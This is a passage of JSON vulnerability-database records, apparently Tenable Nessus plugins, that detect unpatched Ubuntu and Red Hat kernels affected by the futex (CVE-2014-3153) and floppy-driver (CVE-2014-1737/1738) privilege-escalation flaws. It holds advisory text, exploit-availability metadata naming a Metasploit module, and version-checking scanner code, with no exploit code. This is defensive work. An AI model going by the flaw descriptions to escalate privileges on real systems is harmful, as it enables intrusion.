audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2014-0055\", \"CVE-2014-3122\", \"CVE-2014-3153\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2235-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-64-generic\", pkgver:\"3.2.0-64.97\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-64-generic-pae\", pkgver:\"3.2.0-64.97\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-64-highbank\", pkgver:\"3.2.0-64.97\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-64-virtual\", pkgver:\"3.2.0-64.97\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.2-generic / linux-image-3.2-generic-pae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:14:40", "description": "Updated kernel packages that fix three security issues are now\navailable for Red Hat Enterprise Linux 6.2 Extended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A flaw was found in the way the Linux kernel's futex subsystem\nhandled the requeuing of certain Priority Inheritance (PI) futexes. A\nlocal, unprivileged user could use this flaw to escalate their\nprivileges on the system. (CVE-2014-3153, Important)\n\n* A flaw was found in the way the Linux kernel's floppy driver handled\nuser space provided data in certain error code paths while processing\nFDRAWCMD IOCTL commands. A local user with write access to /dev/fdX\ncould use this flaw to free (using the kfree() function) arbitrary\nkernel memory. (CVE-2014-1737, Important)\n\n* It was found that the Linux kernel's floppy driver leaked internal\nkernel memory addresses to user space during the processing of the\nFDRAWCMD IOCTL command. A local user with write access to /dev/fdX\ncould use this flaw to obtain information about the kernel heap\narrangement. (CVE-2014-1738, Low)\n\nNote: A local user with write access to /dev/fdX could use these two\nflaws (CVE-2014-1737 in combination with CVE-2014-1738) to escalate\ntheir privileges on the system.\n\nRed Hat would like to thank Kees Cook of Google for reporting\nCVE-2014-3153, and Matthew Daley for reporting CVE-2014-1737 and\nCVE-2014-1738. Google acknowledges Pinkie Pie as the original reporter\nof CVE-2014-3153.\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The system\nmust be rebooted for this update to take effect.", "edition": 25, "published": "2014-11-08T00:00:00", "title": "RHEL 6 : kernel (RHSA-2014:0800)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1737", "CVE-2014-1738", "CVE-2014-3153"], "modified": "2014-11-08T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-firmware", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel", "cpe:/o:redhat:enterprise_linux:6.2", "p-cpe:/a:redhat:enterprise_linux:python-perf", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:kernel-doc"], "id": "REDHAT-RHSA-2014-0800.NASL", "href": "https://www.tenable.com/plugins/nessus/79032", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0800. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79032);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-1737\", \"CVE-2014-1738\", \"CVE-2014-3153\");\n script_xref(name:\"RHSA\", value:\"2014:0800\");\n\n script_name(english:\"RHEL 6 : kernel (RHSA-2014:0800)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix three security issues are now\navailable for Red Hat Enterprise Linux 6.2 Extended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A flaw was found in the way the Linux kernel's futex subsystem\nhandled the requeuing of certain Priority Inheritance (PI) futexes. A\nlocal, unprivileged user could use this flaw to escalate their\nprivileges on the system. (CVE-2014-3153, Important)\n\n* A flaw was found in the way the Linux kernel's floppy driver handled\nuser space provided data in certain error code paths while processing\nFDRAWCMD IOCTL commands. A local user with write access to /dev/fdX\ncould use this flaw to free (using the kfree() function) arbitrary\nkernel memory. (CVE-2014-1737, Important)\n\n* It was found that the Linux kernel's floppy driver leaked internal\nkernel memory addresses to user space during the processing of the\nFDRAWCMD IOCTL command. A local user with write access to /dev/fdX\ncould use this flaw to obtain information about the kernel heap\narrangement. (CVE-2014-1738, Low)\n\nNote: A local user with write access to /dev/fdX could use these two\nflaws (CVE-2014-1737 in combination with CVE-2014-1738) to escalate\ntheir privileges on the system.\n\nRed Hat would like to thank Kees Cook of Google for reporting\nCVE-2014-3153, and Matthew Daley for reporting CVE-2014-1737 and\nCVE-2014-1738. Google acknowledges Pinkie Pie as the original reporter\nof CVE-2014-3153.\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The system\nmust be rebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:0800\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-1737\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-1738\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3153\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Android \"Towelroot\" Futex Requeue Kernel Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/05/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6\\.2([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.2\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2014-1737\", \"CVE-2014-1738\", \"CVE-2014-3153\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2014:0800\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:0800\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-2.6.32-220.52.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.32-220.52.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-2.6.32-220.52.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.32-220.52.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-debuginfo-2.6.32-220.52.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-2.6.32-220.52.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.32-220.52.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", reference:\"kernel-doc-2.6.32-220.52.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", reference:\"kernel-firmware-2.6.32-220.52.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.32-220.52.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"perf-2.6.32-220.52.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"perf-debuginfo-2.6.32-220.52.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"python-perf-2.6.32-220.52.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-2.6.32-220.52.1.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debug / kernel-debug-debuginfo / kernel-debug-devel / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:14:43", "description": "Updated kernel packages that fix three security issues and one bug are\nnow available for Red Hat Enterprise Linux 6.4 Extended Update\nSupport.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A flaw was found in the way the Linux kernel's futex subsystem\nhandled the requeuing of certain Priority Inheritance (PI) futexes. A\nlocal, unprivileged user could use this flaw to escalate their\nprivileges on the system. (CVE-2014-3153, Important)\n\n* A flaw was found in the way the Linux kernel's floppy driver handled\nuser space provided data in certain error code paths while processing\nFDRAWCMD IOCTL commands. A local user with write access to /dev/fdX\ncould use this flaw to free (using the kfree() function) arbitrary\nkernel memory. (CVE-2014-1737, Important)\n\n* It was found that the Linux kernel's floppy driver leaked internal\nkernel memory addresses to user space during the processing of the\nFDRAWCMD IOCTL command. A local user with write access to /dev/fdX\ncould use this flaw to obtain information about the kernel heap\narrangement. (CVE-2014-1738, Low)\n\nNote: A local user with write access to /dev/fdX could use these two\nflaws (CVE-2014-1737 in combination with CVE-2014-1738) to escalate\ntheir privileges on the system.\n\nRed Hat would like to thank Kees Cook of Google for reporting\nCVE-2014-3153, and Matthew Daley for reporting CVE-2014-1737 and\nCVE-2014-1738. Google acknowledges Pinkie Pie as the original reporter\nof CVE-2014-3153.\n\nThis update also fixes the following bug :\n\n* A previous change that introduced global clock updates caused guest\nmachines to boot slowly when the host Time Stamp Counter (TSC) was\nmarked as unstable. The slow down increased with the number of vCPUs\nallocated. To resolve this problem, a patch has been applied to limit\nthe rate of the global clock updates. (BZ#1102253)\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The system\nmust be rebooted for this update to take effect.", "edition": 27, "published": "2014-11-08T00:00:00", "title": "RHEL 6 : kernel (RHSA-2014:0900)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1737", "CVE-2014-1738", "CVE-2014-3153"], "modified": "2014-11-08T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x", "p-cpe:/a:redhat:enterprise_linux:kernel-firmware", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "cpe:/o:redhat:enterprise_linux:6.4", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:python-perf", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:kernel-doc", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-i686"], "id": "REDHAT-RHSA-2014-0900.NASL", "href": "https://www.tenable.com/plugins/nessus/79035", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0900. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79035);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-1737\", \"CVE-2014-1738\", \"CVE-2014-3153\");\n script_xref(name:\"RHSA\", value:\"2014:0900\");\n\n script_name(english:\"RHEL 6 : kernel (RHSA-2014:0900)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix three security issues and one bug are\nnow available for Red Hat Enterprise Linux 6.4 Extended Update\nSupport.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A flaw was found in the way the Linux kernel's futex subsystem\nhandled the requeuing of certain Priority Inheritance (PI) futexes. A\nlocal, unprivileged user could use this flaw to escalate their\nprivileges on the system. (CVE-2014-3153, Important)\n\n* A flaw was found in the way the Linux kernel's floppy driver handled\nuser space provided data in certain error code paths while processing\nFDRAWCMD IOCTL commands. A local user with write access to /dev/fdX\ncould use this flaw to free (using the kfree() function) arbitrary\nkernel memory. (CVE-2014-1737, Important)\n\n* It was found that the Linux kernel's floppy driver leaked internal\nkernel memory addresses to user space during the processing of the\nFDRAWCMD IOCTL command. A local user with write access to /dev/fdX\ncould use this flaw to obtain information about the kernel heap\narrangement. (CVE-2014-1738, Low)\n\nNote: A local user with write access to /dev/fdX could use these two\nflaws (CVE-2014-1737 in combination with CVE-2014-1738) to escalate\ntheir privileges on the system.\n\nRed Hat would like to thank Kees Cook of Google for reporting\nCVE-2014-3153, and Matthew Daley for reporting CVE-2014-1737 and\nCVE-2014-1738. Google acknowledges Pinkie Pie as the original reporter\nof CVE-2014-3153.\n\nThis update also fixes the following bug :\n\n* A previous change that introduced global clock updates caused guest\nmachines to boot slowly when the host Time Stamp Counter (TSC) was\nmarked as unstable. The slow down increased with the number of vCPUs\nallocated. To resolve this problem, a patch has been applied to limit\nthe rate of the global clock updates. (BZ#1102253)\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The system\nmust be rebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:0900\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-1737\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-1738\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3153\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Android \"Towelroot\" Futex Requeue Kernel Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/05/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2014-1737\", \"CVE-2014-1738\", \"CVE-2014-3153\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2014:0900\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:0900\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"kernel-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"kernel-debug-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-debug-2.6.32-358.46.1.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", 